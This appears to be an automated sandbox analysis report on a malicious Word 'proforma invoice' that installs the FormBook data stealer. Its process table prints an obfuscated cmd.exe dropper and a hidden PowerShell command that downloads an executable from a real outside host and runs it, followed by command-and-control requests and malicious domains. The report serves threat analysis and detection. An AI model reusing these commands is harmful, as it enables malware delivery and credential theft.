File name: | Proforma invoice.doc |
Full analysis: | https://app.any.run/tasks/592bd048-91af-4c73-a0b7-0289d9d30cd7 |
Verdict: | Malicious activity |
Threats: | FormBook is a data stealer that is being distributed as a MaaS. FormBook differs from a lot of competing malware by its extreme ease of use that allows even the unexperienced threat actors to use FormBook virus. |
Analysis date: | January 17, 2019, 22:06:46 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: D!akov RePack, Template: Normal.dotm, Last Saved By: D!akov RePack, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Jan 15 22:59:00 2019, Last Saved Time/Date: Tue Jan 15 22:59:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 0, Security: 0 |
MD5: | 0AC75DBEB4025460CD9F076DCE9D9B7B |
SHA1: | 7E30F0B6614F3309DE4F7184EF38EFCB0D3A7266 |
SHA256: | 0DD37E4F6A326C5A21FE4052227B7FB81C3F2CA0B6E0ABC7607BD979D3B1E0CF |
SSDEEP: | 192:w+NslLZEvA+6/6rrILd/Kf3HO8teQMI9JRVEoS8CcJxuXyN0jBZdtpMia:wD8iSUR/8deU5S8PJUyN0jBLt+ |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 15 |
CharCountWithSpaces: | - |
Paragraphs: | - |
Lines: | - |
Company: | diakov.net |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | - |
Words: | - |
Pages: | 1 |
ModifyDate: | 2019:01:15 22:59:00 |
CreateDate: | 2019:01:15 22:59:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 2 |
LastModifiedBy: | D!akov RePack |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | D!akov RePack |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2984 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Proforma invoice.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
3016 | "C:\Windows\System32\cmd.exe" /v:ON /c"set done= && set x=oi9Bx(5Wc;Tnd:3m1lJ.hz/EMLwH%y)bCeFD'jpS\as-utN,Yr fP && for %H in (38,0,26,33,49,42,20,33,17,17,50,43,26,50,27,1,12,12,33,11,50,43,23,4,33,8,44,45,1,0,11,52,0,17,1,8,29,50,3,29,38,41,42,42,50,5,11,33,26,43,0,31,37,33,8,45,50,39,29,42,45,33,15,19,46,33,45,19,7,33,31,32,17,1,33,11,45,30,19,35,0,26,11,17,0,41,12,34,1,17,33,5,36,20,45,45,38,42,13,22,22,51,49,0,1,12,51,0,11,12,43,42,45,33,37,33,41,11,11,33,12,41,49,8,19,51,49,22,37,44,31,41,37,33,0,19,33,4,33,36,47,36,28,10,23,24,52,28,40,37,44,31,41,37,33,0,19,33,4,33,36,30,9,50,28,10,23,24,52,28,40,37,44,31,41,37,33,0,19,33,4,33,1618) DO (set done=!done!!x:~%H,1!) && if %H == 1618 call !done:~-182!" | C:\Windows\System32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
1436 | powershell -w Hidden -ExecutionPolicy Bypass (new-object System.Net.WebClient).DownloadFile('https://froidfond-stejeannedarc.fr/jubajeo.exe','C:\Users\admin\AppData\Local\Temp\jubajeo.exe'); C:\Users\admin\AppData\Local\Temp\jubajeo.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3540 | "C:\Users\admin\AppData\Local\Temp\jubajeo.exe" | C:\Users\admin\AppData\Local\Temp\jubajeo.exe | — | powershell.exe |
User: admin Company: EDP - Energias de Portugal Integrity Level: MEDIUM Description: Dynamic IP Restriction Module Exit code: 0 Version: 8.1.23.2 | ||||
2244 | "C:\Users\admin\AppData\Local\Temp\jubajeo.exe" | C:\Users\admin\AppData\Local\Temp\jubajeo.exe | — | jubajeo.exe |
User: admin Company: EDP - Energias de Portugal Integrity Level: MEDIUM Description: Dynamic IP Restriction Module Exit code: 0 Version: 8.1.23.2 | ||||
2744 | "C:\Windows\System32\dwm.exe" | C:\Windows\System32\dwm.exe | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Desktop Window Manager Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3604 | /c del "C:\Users\admin\AppData\Local\Temp\jubajeo.exe" | C:\Windows\System32\cmd.exe | — | dwm.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
284 | C:\Windows\Explorer.EXE | C:\Windows\explorer.exe | — | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Explorer Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3464 | "C:\Program Files\Mozilla Firefox\Firefox.exe" | C:\Program Files\Mozilla Firefox\Firefox.exe | dwm.exe | |
User: admin Company: Mozilla Corporation Integrity Level: MEDIUM Description: Firefox Exit code: 0 Version: 61.0.2 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2984 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRE802.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2984 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DF190125782D0B8BB5.TMP | — | |
MD5:— | SHA256:— | |||
2984 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{0B4C83C6-5501-47DD-B1AB-326D74EA6C66}.tmp | — | |
MD5:— | SHA256:— | |||
2984 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{8A6F9EDB-1A43-410C-BB87-4DF3927C7DB0}.tmp | — | |
MD5:— | SHA256:— | |||
1436 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SOEZBHZ4YK394KCQHCXO.temp | — | |
MD5:— | SHA256:— | |||
1436 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8 | SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3 | |||
1436 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF215217.TMP | binary | |
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8 | SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3 | |||
2984 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:8F74DDB4BD71FB96CFA0B2BD6E374361 | SHA256:B65F362B17437F851F916CC16A9A79276A5BD44FE57640300F2AAF3E3307CE1C | |||
2984 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$oforma invoice.doc | pgc | |
MD5:4D4565552C4E8B649B4B834DEBE0BF04 | SHA256:A676D87E0DC7CFB00BEADB43196ADDF403EB77F0CE0BE34845E918C4977CD10E | |||
2744 | dwm.exe | C:\Users\admin\AppData\Roaming\J11OTS2E\J11logrc.ini | binary | |
MD5:7DD5EF3DBBB351ACFC3671A6E0F49047 | SHA256:BCD6E29EC1D7F26598284623704D15326637F2E083F4ADDB0A82FF876FDC2B99 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
284 | explorer.exe | GET | — | 173.236.144.95:80 | http://www.associationla.com/sa/?Bj=m3bR0/i6QEl+JfsdQO8pqxfsfn4j/1iUeSC2s+iD7Qi/SW0i+RKzckpy58kFErSmSb8oPw==&b6=uVBXnLRHQZclu | US | — | — | malicious |
284 | explorer.exe | GET | — | 142.234.216.104:80 | http://www.haozi8.com/sa/?Bj=rkzcQG510u2z34k5Drjx9zT6eDKlaDgpWUthLNxv00ym3zvVe+b1EFLcja2u2sRHPViz4g==&b6=uVBXnLRHQZclu&sql=1 | US | — | — | malicious |
284 | explorer.exe | GET | — | 208.91.197.27:80 | http://www.laniedenslow.net/sa/?Bj=A9ORVt2ZoHYGBOl/VO2I067Ay5clWmiul+Pdhod07xICN8JiGnLpQCuwrEzMW0SmtHcO8w==&b6=uVBXnLRHQZclu&sql=1 | US | — | — | malicious |
284 | explorer.exe | POST | — | 64.98.145.30:80 | http://www.paapostille.com/sa/ | CA | — | — | malicious |
284 | explorer.exe | GET | 200 | 64.98.145.30:80 | http://www.paapostille.com/sa/?Bj=gqLAWY6+M9By5AAH2cRNr2rYDqe9NTZp7UAkwnK4XjckeIRQKQZpn9jUhEwRBUoyGaQvYw==&b6=uVBXnLRHQZclu&sql=1 | CA | html | 5.81 Kb | malicious |
284 | explorer.exe | POST | — | 64.98.145.30:80 | http://www.paapostille.com/sa/ | CA | — | — | malicious |
284 | explorer.exe | POST | — | 142.234.216.104:80 | http://www.haozi8.com/sa/ | US | — | — | malicious |
284 | explorer.exe | POST | — | 208.91.197.27:80 | http://www.laniedenslow.net/sa/ | US | — | — | malicious |
284 | explorer.exe | POST | — | 142.234.216.104:80 | http://www.haozi8.com/sa/ | US | — | — | malicious |
284 | explorer.exe | POST | — | 64.98.145.30:80 | http://www.paapostille.com/sa/ | CA | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
284 | explorer.exe | 64.98.145.30:80 | www.paapostille.com | Tucows.com Co. | CA | malicious |
284 | explorer.exe | 173.236.144.95:80 | www.associationla.com | New Dream Network, LLC | US | malicious |
1436 | powershell.exe | 213.186.33.40:443 | froidfond-stejeannedarc.fr | OVH SAS | FR | malicious |
284 | explorer.exe | 142.234.216.104:80 | www.haozi8.com | Nobis Technology Group, LLC | US | malicious |
284 | explorer.exe | 87.236.16.76:80 | www.naidi.info | Beget Ltd | RU | malicious |
284 | explorer.exe | 52.0.217.44:80 | www.alcoyindustrial.com | Amazon.com, Inc. | US | whitelisted |
284 | explorer.exe | 208.91.197.27:80 | www.laniedenslow.net | Confluence Networks Inc | US | malicious |
284 | explorer.exe | 199.192.26.77:80 | www.dozceb.com | — | US | malicious |
Domain | IP | Reputation |
---|---|---|
froidfond-stejeannedarc.fr |
| malicious |
www.associationla.com |
| malicious |
www.paapostille.com |
| malicious |
www.drkmatter.network |
| unknown |
www.haozi8.com |
| malicious |
www.naidi.info |
| malicious |
www.netaspor.net |
| unknown |
www.viplikesystem.com |
| unknown |
www.laniedenslow.net |
| malicious |
www.alcoyindustrial.com |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
284 | explorer.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious HTTP-GET request with body and minimal header |
284 | explorer.exe | A Network Trojan was detected | MALWARE [PTsecurity] FormBook CnC Checkin (GET) |
284 | explorer.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious HTTP-GET request with body and minimal header |
284 | explorer.exe | A Network Trojan was detected | MALWARE [PTsecurity] FormBook CnC Checkin (GET) |
284 | explorer.exe | A Network Trojan was detected | MALWARE [PTsecurity] TrojanSpy:FormBook CnC Checkin (POST) |
284 | explorer.exe | A Network Trojan was detected | MALWARE [PTsecurity] FormBook CnC Checkin (POST) |
284 | explorer.exe | A Network Trojan was detected | MALWARE [PTsecurity] TrojanSpy:FormBook CnC Checkin (POST) |
284 | explorer.exe | A Network Trojan was detected | MALWARE [PTsecurity] TrojanSpy:FormBook CnC Checkin (POST) |
284 | explorer.exe | A Network Trojan was detected | MALWARE [PTsecurity] FormBook CnC Checkin (POST) |
284 | explorer.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious HTTP-GET request with body and minimal header |